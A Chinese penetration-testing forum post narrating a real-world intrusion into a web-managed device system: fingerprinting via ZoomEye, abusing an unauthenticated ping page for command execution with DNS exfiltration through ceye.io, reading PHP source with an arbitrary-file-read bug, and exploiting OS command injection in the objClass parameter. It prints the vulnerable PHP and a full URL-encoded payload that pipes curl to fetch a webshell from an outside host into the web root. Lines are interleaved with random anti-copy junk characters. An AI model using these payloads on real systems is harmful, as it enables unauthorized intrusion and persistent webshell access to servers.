中国网络渗透测试联盟

标题: Web安全之实战通过os命令注入漏洞getwebshell [打印本页]
作者: admin    时间: 2022-3-31 01:39
标题: Web安全之实战通过os命令注入漏洞getwebshell
[md]**一、7 ^( q  {9 p. |4 w% v: }
** **寻找突破口**
( h: I1 q5 P) f( h! Q6 C* h$ v9 K! m4 u( b0 x, w4 k2 a3 t7 v6 D
**经过右键查看源代码发现系统的特征为:images/select_bg.png,去钟馗之眼搜索如图:**/ H# l  _' P) v5 V& w- G+ K
5 ?& v: g2 W! \, ?
![image.png](data/attachment/forum/202203/31/013456oll79nxwhwxz9h2l.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")
. x2 m8 B" w( Q- X, J/ A
3 l. T8 _. {# Y2 Y: l- i& b1 J  J' D* G5 N+ U  ?" D+ a
$ J/ b0 W3 N; D+ G2 [" b) S
**发现reporter和[Technology,2 p9 D9 p; ^4 d$ j1 S. ^2 ~
Inc.](https://www.zoomeye.org/searchRe ... title:%22Technology,%20Inc.%22&t=all)都采用这个特征,然后一看之前搞过这样的系统,有源代码,对照源代码目录发现了未授权访问页面。**
, A1 s/ i* O( v0 g- T
* q% X6 K1 o2 j7 @" Q" _* R**地址为:**5 n! Q$ w4 r- B: W' Q, p% v
" g1 c, U' s# o2 i, K% W
[http://1.1.1.1//view/systemConfi ... ;text_packetsize=64](http://1.1.1.1/view/systemConfig ... ;text_packetsize=64)**,如图:**
' _+ I0 I1 }9 q( o  Z2 v$ R6 c& X/ `8 i3 M  U. E' g4 }% D2 k
![image.png](data/attachment/forum/202203/31/013528hffsyjijhb58lhh5.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")( J: t0 |& C! R$ z. Z
4 d* p7 P4 K3 j$ V6 ]& ?" w

: j. r3 O% _. h7 ~) R. `: k; T( m! t# m6 {1 s" W
**测试ping这里的功能,发现可以绕过ping正常功能执行命令,payload为:**
+ a9 y0 X7 ?7 h% {. B( }
1 d- @2 ^8 c( A**`whoami`.1111.ceye.io** **,如图:**
8 n# z. u$ F/ k: G% ~8 P, h8 c
![image.png](data/attachment/forum/202203/31/013559bwl0r0lrgkpm8lrw.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")
0 I* ~" V& T8 _# O$ o& [3 l- N/ l, a' Y$ c7 I! @

' I) t% v( P& Y+ H! |' Z2 X4 T0 p) {% ]  x/ k7 _
**返回dns记录如图:**: c# n6 H! }' s) Y, f& Y
6 ]4 R# {0 C0 {( Q7 J
![image.png](data/attachment/forum/202203/31/013625ei2ea2ealisblpsb.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")
1 S' f( S+ V# n5 R
& t- T3 e' m  \% Y
3 V7 T8 C/ m$ u& @8 ?( G" ~8 I! }" d0 J
**发现当前用户权限为root**
; ]0 j7 f; n2 }' K0 k, E# |6 {5 M2 c2 P2 V% p& P
**一、
- h, l6 k4 R7 k% K* T! x$ {) b) Z** **通过漏洞组合getwebshell**
8 {, s# n/ s! ?2 U
. ?; j. b0 Y" v. K**    ** **文章就按照挖洞顺序往下写,紧接着执行pwd命令获取web路径,如图:**( M2 _) k9 B6 U

4 }; G2 T3 P" p" j. Y![image.png](data/attachment/forum/202203/31/013656tl9z2765580yd7t8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")7 B7 b& p4 i, s% i5 f' X6 N

4 k9 V- Y. S" A4 I# O" B
4 k5 T$ Y" k- N" {9 f! p
7 u$ }; h( Y7 h$ d: }( @* ]5 x**得知网站路径为:/var/www/html/view/systemconfig/systemtool/**6 [" f3 g$ b2 }9 F9 x

7 L( s+ D6 i. a6 b/ }# x9 m**正好利用burpsuite发现一处os命令注入漏洞与一处任意文件查看漏洞,如下图为任意文件查看漏洞截图**
4 K+ ~# G3 x: e2 w! s0 ~3 l( B7 e8 y% S
![image.png](data/attachment/forum/202203/31/013726cn3oj66ngggc6zz8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")6 M" X' v' W8 o/ h) I# `) H
9 F- R5 \, d, g. L- A9 |% I4 T
**Os** **命令注入存的处为:/var/www/html/view/Behavior/toQuery.php,这个路径是通过第一步绕过ping命令正常功能执行命令漏洞获取到的,通过任意文件查看漏洞,我们读取一下源代码**/ b9 R; q* t- v! K1 E" b
5 {! z7 A, U6 Z
![image.png](data/attachment/forum/202203/31/013749x0i8ilbkiuelle4e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")\
  X/ D  G! L2 k
$ o  N3 @9 G, T9 g8 h! e& i% }7 t4 L: E" A9 x; |
**源代码为:**
2 d, G! m  U7 m. F; S, K3 ^
9 z  ^3 C: J, C; h( E( Q, V1 x6 j<?php& i/ H: z/ t$ b. [; T, {
include_once($_SERVER["DOCUMENT_ROOT"]."/model/charFilter.php");
6 E* H! j  N+ F! P& k5 w?>
# G1 I+ x/ C& P0 L! }
1 [2 Q" c! @6 d" c. Q<?php
6 d( p6 y1 I' @  t2 a. v2 k/ l9 |7 U8 |7 K: L* \
$ R5 }( V2 Q8 K4 ^

) p# F) d( C! w- j- k5 zsession_start ();8 E+ t) h4 f) }- x$ j5 ~1 M
- y. t* A5 @9 C. Z- Z, f# o2 z7 V4 i
0 g% a! D3 n; e9 v: \* Z/ N

$ R7 Y. l" U8 I! W( i$ o5 F . |4 a" ^3 z, E

1 t# G* {0 l' }8 b: e
8 V5 x; B4 K# d
% ]( ]1 ^, J* ^& P& Eif ($_GET ["objClass"] == "")
1 Z# l& u. ^$ |( |& d: ^! y5 t/ P# k" |& S

5 P& m  l! J5 ~+ z, x/ ]# N
! x" a. t* o, d  v. V( H      exit ();* K5 q; T  P: T9 X* i

& \: G+ x, O) J4 L( N0 z; ]- u# W$ u/ |; P' j7 ~- q' d4 T
3 x( n! @! N3 D
$param = $_REQUEST;
' x" d# ?  B  B( o
1 a8 r1 U2 R, u# f9 y
9 |, P3 K; r; H2 \. F/ d  u$ K4 ]! y7 D  U) D( c/ m4 A% m
% A( B* ]" ~6 B8 `9 ]: f

+ {; q" E' p2 ]% K& K# A. Q0 Q4 x$ h7 k- ]/ y

) J6 |( ]) k2 |//echo "\n--------------------------\n";3 e9 u3 W$ d  W6 A0 E  X3 i3 g

$ A8 Z1 J0 Q. V, k" S( a# M
& ?4 J1 E. b+ Q; F* v7 m# ~* D- J* X: l; E
//print_r($param);
! T, s* _4 W9 X0 H1 Q* F' g
  ~; L) N; L7 t0 K# O+ M
. [& V' u9 Q* t' X' o
& D; _- C% _' T//echo "\n--------------------------\n";, s; V' M0 a* F, u) A& d

  n0 E, P$ d* X4 K# W
! ^5 B  r4 R: G: o0 T6 l! u
' V6 H) G/ m, h, ?1 {[if ($_GET ["method"] ==9 \; |4 F8 M1 P0 p# r7 q
"getList" || $_GET ["method"] == "import" ||
1 @/ [! D1 d" h$_GET ["method"] == "processAlarm") ](){/ a5 Y. k" @; ^# f, H9 k; c
/ l0 M: k  z6 ]$ M

( m' y7 x; h/ M: E5 D  [" ?1 j; u4 I2 ]4 k0 X
      $param
% r& x: J2 [2 \["user"] = $_SESSION ["s_userName"];
, ?  T0 l* |0 D6 o  Q- V" y3 I6 D  X* _+ e0 t) K- [& c4 ?

: @" B! Q% }7 t& V/ E6 _) ?
' u: z. A2 Q( t7 m      $param
: K0 |6 C# X# W1 _# j["lan"] = $_SESSION ["lan"];* q: M1 z; f+ y$ g4 Z

+ B% N7 d5 P! ~5 q: j
3 c& J; b  M7 F* k/ D4 T; M& D; e% A
      $param
4 ?7 ]. t) X, ]2 Y, b["regUserpath"] = $_SESSION ["regUserpath"];
: R7 p  |" Z5 ?/ |: g2 D. S0 x! D$ Q( c7 {. u
' n; n* u' t: u6 r0 G1 m

6 ]  z5 ^  y* O) F; C7 K$ _  }    4 l4 n6 @6 n  I6 ~" J* S/ P

- A8 o, z" U7 z) u  [8 ^! n% n# w) N5 J+ \; C; G

' }) w8 Y* C0 c      exec (
. q4 z0 \6 c5 |1 D) J"rm -rf /tmp/cache" );4 M* e7 S0 i$ P

& o) G7 F1 K/ A' O3 @
( ^2 g$ O" M' m  d) r! @* k3 n- S* P1 A6 f
      [$cmd = "/usr/local/php/bin/php ".$_SERVER
# U! F) L8 b7 g% r, \1 |["DOCUMENT_ROOT"] . "system/behavior/behavior_query.php";]()
) x, a3 m2 [4 P- _7 f
% C" P4 b  R3 G8 x+ ~% Q" w" H* _, U
, j* o. q+ h# X; y' }
+ k" i0 \- `( @+ |4 Q/ H( q- a      $cmd .=
& V! y4 i% ^% l* H" a% @9 U" " . $_GET ["objClass"];- A2 U( @1 `5 d" R/ {: Y3 }
1 ?0 f/ p9 k  T9 b# E6 T& k
' y# D, z- i8 m! B% G" {: V9 E! n( S

% H$ g9 Z0 Z8 t$ u# w8 v      $cmd .=& ]2 m7 x8 M1 T8 n
" " . $_GET ["method"];
" z& a  t; d, W9 Y0 [' m9 f
5 W6 B8 ^% T  K/ K7 f6 t2 B$ \/ [  R+ A6 r# u- u2 q# I/ B
) n9 g5 v4 I, e! M6 \  T- M/ I/ |
      $cmd .=$ L! R( w+ L2 d
" " . base64_encode ( json_encode ( $param ) );
; v5 r/ s% @* U& f5 e6 w2 O  x# p; s
3 |6 ^( y' B4 _9 \( K9 Y

. G  z* i1 I/ Q+ ?* E      [file_put_contents("/tmp/query_cmd",$cmd);]()
9 Q, O1 m, }) w2 z" ]( ^; a2 V
, Y+ e- X3 T2 A5 T, K1 h8 S1 z* m% d' X. o# |5 i' c; G5 J% X& J9 j2 v
/ L. p& Z+ e5 F( ^
      exec ( $cmd . "
0 a( y4 H9 F: ~7 ]% }# q> /dev/null &" );* x& G( i( V: W7 k, a; }
/ [  G0 t1 J. b$ M/ K' K

/ I  }+ D: L% |5 ?; B! s2 `1 ~' o# ?% z% B- k1 j1 y

8 Z, u0 E; l0 P" H0 S, F2 g8 i& m
, x1 C% E  D5 W9 J2 E} else {2 u' g7 I+ R* ?( I

- ]/ u0 C  ?0 @+ n" N4 P
9 q1 h- A4 _$ s; N
2 u0 n, P; B7 f5 m      require_once5 V  E/ @# Y9 M: p: m' ]/ G; z
($_SERVER ["DOCUMENT_ROOT"] . "system/behavior/behavior_Detail.php");( L6 X" c  _# l9 L) o
4 S: Z% B3 p1 L

+ K+ ]& f: n- B+ N$ d5 @( P5 u, E/ f
      $obj = new7 d; ~& V7 A- m
QueryInterface ();
( `/ n1 ?% D  [6 f. o# k% H
- s# ~' k& D5 o; P# D
3 J+ E/ z/ k4 k* t, M4 A
) u+ M; a# A* F2 M      $instance =4 D( v+ }/ z$ x  g7 N4 d4 v' o
$obj->getInstance ();4 h. O7 }- S6 y

1 C2 x  _4 S2 n" \. D1 ^# e% D6 ^: _  i2 a; R

0 y2 H5 d' i* ]      $instance->invokeMethod3 n- T# ]0 D- O- R0 g, l, l! f
( $_GET ["objClass"], $_GET ["method"], $param );
: l. I( [' u9 m! N3 _+ u. \5 A; R1 F) Z: v; H, d

; k# w. `8 w4 [9 R' g/ Q4 c7 Y( z7 K0 U
}+ x' J. G/ ]7 K3 @- f

9 C# O: F8 _7 Z) ]9 b; i- X& U
8 G- g/ w  f/ F& i) G/ w4 T1 N3 I' @$ x( s
exit ();
, J  ]5 ]! h$ T
- @- G, [9 Q. ~: ]! L
6 S* R; W2 p( r  }
4 ]- f8 U8 q3 \0 O9 ~6 t% k?>6 w+ @4 M2 Y; p# @
3 ~& C: b1 L& Z' Y0 C
**经常简单审计发现if ($_GET! W; F$ E; I7 U% j6 s& i( C
["method"] == "getList" || $_GET ["method"] ==( p7 L: M5 D2 |
"import" || $_GET ["method"] == "[processAlarm]()"),如果method只要等于getList、import、processAlarm这其中一个,$cmd =4 H5 F1 A0 E, o0 e1 X' q
"/usr/local/php/bin/php ".$_SERVER ["DOCUMENT_ROOT"] .
0 ?/ ?/ \$ m  k$ j9 ], h8 O"[system/behavior/behavior_query.php]()";  cmd等于web绝对路径+ system/behavior/behavior_query.php,然后file_put_contents("/tmp/query_cmd",$cmd);**
" {  o% Q& s2 C8 V- W
- L+ E' {# k8 k9 l**      exec ( $cmd
4 Z( @7 w# e2 G, R+ K4 z. "  > /dev/null &" );** **给我们构造了一个命令注入的参数,这里直接造成了OS命令注入漏洞,下面看我演示**4 j1 O9 _" v: @; ?8 A
- H0 D" ]$ T% A9 N0 p- d2 y
( `) ^6 W2 @% V% {, o; L6 Z
![image.png](data/attachment/forum/202203/31/013842ceg7htegblnr4nnk.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")
" q5 `2 f1 z" \; o! |$ F, X* ^' T+ p
% v+ u2 Y/ X  W' F6 |
6 D, X1 K# v. }( r9 n0 E- A6 o' L
**图中objClass=存在OS命令注入漏洞,我之前试图通过bash反弹shell,但是测试了一晚上没反弹成功,最后选择了curl下载webshell,payload如下:**, U8 y5 i, F& A3 Q" l: W; b6 f

! h  t, c+ Y$ t: e7 d# O  X**%7Ccurl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php%7C%7C%60pcurl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php%60%20%23%27%20%7Ccurl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php%7C%7C%60curl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php%60%20%23%5C%22%20%7Ccurl%20http%3A%2F%2F1.1.1.1%2FqYCwxRz1.zip%20-o%20%2Fvar%2Fwww%2Fhtml%2Fimages%2Fsuiji2.php**4 d  Q' Y1 V: m0 g* A8 c0 N* X( Q. P
0 E6 ~! c% L/ }, ^/ C
**我们用url解码如下:**6 F0 L( r  H! D- l' y: ]

) D+ c+ {* |* Y; R% K5 d4 N**|curl http://1.1.1.1/qYCwxRz1.zip -o
( t& X& f' D) c4 G5 Q: f# T/var/www/html/images/suiji2.php||`pcurl http://1.1.1.1/qYCwxRz1.zip -o /var/www/html/images/suiji2.php` #' |curl http://1.1.1.1/qYCwxRz1.zip -o3 m+ S9 T3 Q/ x) D% F/ w6 A
/var/www/html/images/suiji2.php||`curl http://1.1.1.1/qYCwxRz1.zip -o /var/www/html/images/suiji2.php` #\" |curl ** [**http://1.1.1.1/qYCwxRz1.zip -o /var/www/html/images/suiji2.php**](http://8.136.218.186/qYCwxRz1.zi ... l/images/suiji2.php)
. w, K1 A0 B1 I9 d6 Z$ w/ o* r
$ ?& F5 t2 o; U# K! X**使用这么多管道符|就是要闭合payload,最后成功curl下载webshell如图:**
; ?& A4 V& H. z: ~7 V6 I3 \9 W, J1 V' g. R
/ M  o; s. n: }4 I# a
![image.png](data/attachment/forum/202203/31/013922zdonl51onkonxqqz.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/300 "image.png")
- {8 o7 L' R# Q: }6 `9 p" i
  R* L# ?  r' l/ S% X0 m6 O% F/ D# ?. P1 C, v, C

, L1 A  ~" u, o% ]% J8 k
. S3 _/ [( Z8 G+ P**三、总结**1 w- D2 d7 s1 k3 [# K5 o

  i+ X2 R' N* W**   ** **案例之所以最终获得webshell,很大程度上是取决于几个漏洞的组合,首先通过右键查看源代码找到目标系统使用的系统,因为之前测试过与目标类似的程序。然后“对症下药”找到了ping未授权访问页面,通过绕过ping命令正常功能执行pwd命令获取到网站绝对路径,其次,使用任意文件查看漏洞去读取疑似存在os命令执行漏洞的php进行简单审计,经过确认存在此漏洞,最后构造os命令执行payload,最终getwebshell,整个getwebshell过程就是一个漏洞的连环组合,渗透更多的时候是靠运气,如果这几个环节有一个环节漏洞不存在或者没挖到,可能导致getwebshell失败。**
* w8 @: W7 X1 M  v9 m7 A
  i+ l/ Z: X# m( {**   ** **综上所述,运气与挖洞功底同等重要,谢谢观看** **! **
; v1 e" B% [* N  ~+ n[/md]



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2